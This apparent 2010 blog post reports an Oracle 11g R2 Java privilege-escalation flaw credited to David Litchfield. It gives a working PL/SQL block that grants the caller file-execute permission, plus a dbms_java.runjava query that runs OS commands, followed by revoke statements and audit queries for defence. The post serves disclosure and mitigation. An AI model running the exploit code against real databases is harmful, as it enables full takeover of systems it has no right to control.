Oracle Exploit Published 11g R2

Just found this alert.

Credit goes to David Litchfield. He found these vulnerabilities. This also affects 11g R2.

Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database.

Basically, using DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS, a user can change their own privileges in the Java policy table so that the JVM allows them to execute operating system commands and to read and write files.

Here is the code:

DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM dual;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;

Oracle does not have a patch for it yet, but you should revoke privileges from PUBLIC for the following packages:

revoke execute on DBMS_JVM_EXP_PERMS from public;
revoke execute on DBMS_JAVA from public;
revoke execute on DBMS_JAVA_TEST from public;
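
To confirm the revokes took effect and to spot Java policy rows like the one the PL/SQL block above creates, the following audit queries can be run. This is an added example, not part of the original post; it assumes the session can read the standard dictionary views DBA_TAB_PRIVS, DBA_JAVA_POLICY, DBA_USERS and DBA_ROLES, and the column aliases are chosen here for illustration.

```sql
-- Added audit example (not from the original post).
-- Run as an account that can read the DBA_* dictionary views.

-- 1. Who can still execute the three packages named in the post?
--    After the REVOKE statements, PUBLIC should no longer be listed.
--    Any remaining grantee should be one you can justify.
SELECT p.grantee,
       p.owner,
       p.table_name AS package_name,
       p.privilege,
       p.grantable
FROM   dba_tab_privs p
WHERE  p.privilege  = 'EXECUTE'
AND    p.table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA', 'DBMS_JAVA_TEST')
ORDER  BY p.table_name, p.grantee;

-- 2. Which grantees hold an enabled Java policy entry allowing
--    'execute' on '<<ALL FILES>>'? The block in the post inserts such a
--    row with the calling user as grantee, so a row whose grantee is an
--    ordinary user account (rather than a role you expect) needs review.
SELECT j.grantee,
       CASE
         WHEN u.username IS NOT NULL THEN 'USER'
         WHEN r.role     IS NOT NULL THEN 'ROLE'
         ELSE 'OTHER'
       END              AS grantee_kind,
       u.account_status,
       u.created        AS user_created,
       j.type_schema,
       j.type_name,
       j.name,
       j.action,
       j.seq
FROM   dba_java_policy j
       LEFT JOIN dba_users u ON u.username = j.grantee
       LEFT JOIN dba_roles r ON r.role     = j.grantee
WHERE  j.kind      = 'GRANT'
AND    j.type_name = 'java.io.FilePermission'
AND    j.name      = '<<ALL FILES>>'
AND    LOWER(j.action) LIKE '%execute%'
AND    j.enabled   = 'ENABLED'
ORDER  BY grantee_kind, j.grantee;
```

Compare the output of the second query against a known-good baseline for your installation, since some built-in roles may legitimately hold file permissions.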

Comments
5 Responses to “Oracle Exploit Published 11g R2”
  1. Java Bad (waves arms slowly and awkwardly at imaginary flames).

Trackbacks
Check out what others are saying...
  1. Social comments and analytics for this post…

    This post was mentioned on Twitter by msutic: Oracle Exploit Published 11g R2 – http://oraclue.com/2010/02/05/oracle-exploit-published-11g-r2/

  2. Your article was most tweeted by Oracle experts in the Twitterverse…

    Come see other top popular articles surfaced by Oracle experts!…

  3. [...] solutions and recommendations.Miladin Modrakovic explains how to avoid an Oracle 11g vulnerability: Oracle Exploit Published 11g R2. Gary Myers makes his own contribution about security issues with 10g and 11g in Exploits and [...]

  4. [...] 0 day exploit Miladin Modrakovic-Oracle Exploit Published 11g R2 2-Faulty quotes about Non Default Block Sizes Charles Hooper-Faulty Quotes 5 – Block Sizes [...]


